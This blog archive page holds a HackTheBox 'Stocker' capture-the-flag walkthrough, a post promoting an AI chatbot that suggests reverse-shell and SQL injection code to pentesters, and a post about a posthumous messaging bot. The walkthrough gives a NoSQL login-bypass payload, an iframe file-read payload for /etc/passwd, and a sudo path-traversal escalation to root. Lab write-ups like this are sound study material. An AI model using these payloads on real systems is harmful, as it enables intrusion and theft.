Tag Archives: bot

HackTheBox – Stocker

HackTheBox

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating and found no robots.txt.
There is a 302 redirect on the standard port.

Added socker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enum a little further and found that there was a vulnerability to NOSQL as found in BurpSuite.

BurpSuite Capture Login

Changing the content-type to json and putting a nosql bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the packet from BurpSuite, this gets a login becuase the express evaluates to true, and we now show items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet to show us /etc/passwd, it will give us a list of users.

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Adding the above captured _id to /api/po/ID to the site gives us the captured iframe data which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username of angoose. Remember we are looking for a non system account and one with a shell such as /bin/bash. The others just show /bin/false or /usr/sbin/nologin so those are unusable for our purpose.

Now we can the same trick to grab the site’s index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too IHeardPassphrasesArePrettySecure thanks to the coder hardcoding it into the script because they had not yet created any kind of dotevn environment or secrets database to store it in.

As an asside, a trick that coders will user is to obfuscate passwords to applications. That is to take a password and base64 encode it and store that in a file. Then read it from the application, run a base64 -d operation on it to show the true password and use it from a variable in the script. This keeps from storing the password in the script. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files in the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by just appending ../../../home/angoose/

This puts us in the correct directory to call our script from our home while still satifisfying the requirements to run the script from /usr/local/scripts, as that is where the starting path is.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some intial challenges with not being able to load the site. After that I had some instability which forced me to have to request a restart on the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Isis – AI chatbot to help you with Penetration Testing

I have been super busy lately. Doing graduate studies, and also working hard every day training for my OSCP exam. I have been very productive tho!

I made some new code for penetration testers that will help be a helper to find code inserts, shells, SQL injection and the like for you. AFAIK it’s the first of it’s kind and it uses some pretty decent AI from openAI.

I like to think of ‘her’ as an angel on my shoulder. Imagine you are under a tight deadline. A company gave you only 5 days to test their websites and report your findings. Then imagine talking to Isis while you work and having her pop up suggestions for reverse-shell code, SQL injection etc. WOOOOOoo!

My Initial work is promising, but stlll some kinks to work out. If you wanna contribute to the code that’d be cool too.

If you are interested in the code you can check it out here: https://github.com/c0ri/isis

Love what I do? https://www.buymeacoffee.com/c0ri

Haniwa

I have been very busy lately working on a new project called Haniwa. The idea is to have a bot which will act as a servant for us after we are dead and gone. Something to carry out our last wishes. It could be like an executor of a will, but with an Artificial Intelligence about it.

Haniwa’s primary function is to let loved ones and friends know that you have passed on, but it also includes the ability to send bank accounts, secret messages, crypto account logins and more. Things you might not be ready to share now, but you surely want someone to have after you are gone. The use cases are as endless as the ideas we have for future releases!

The name Haniwa is actually a Japanese term coined from using figures to place as caretakers for Emperors after they died. Previous to that when an Emperor died, it was commanded that all his servants and family be put to death and sent with him to the afterlife. Many people decided this was barbaric, and came up with the idea to use Haniwa instead. Now I will borrow this term and give it a new meaning, a sort of Flower Robot to tend our Grave after we are dead and gone.

I’ve chosen to run this one on a platform called Bubble.is or Bubble.io now. It is a fantastic no-code application, and I am finding all kinds of niche use cases for it after using it. The best part is it allows me to quickly setup an app and prove it out and get it to a state where it can be tested quickly and as a PoC for Venture Capitalists to jump aboard without wasting too much time coding a site from the ground up.

The first revision on Haniwa is nearly complete with all of the basic features ready such as scheduling mail and secured messages using AES-256 encryption. It is also responsive in that it handles PC, Tablet and Mobile well.

My main goal now is to get it functional and bring it to market. You know the old saying “If you aren’t embarrassed of your first release, you released too late!” I know there is a lot of work to do, and features I really want to add, but it’s important to get it out there.

For me this is something new. As far as I know, there is nothing like this. The idea for it came to me in a dream. I think for myself I am excited to use it.

Does this sound like an interesting idea? Drop me a line and share your stories or suggestions for it!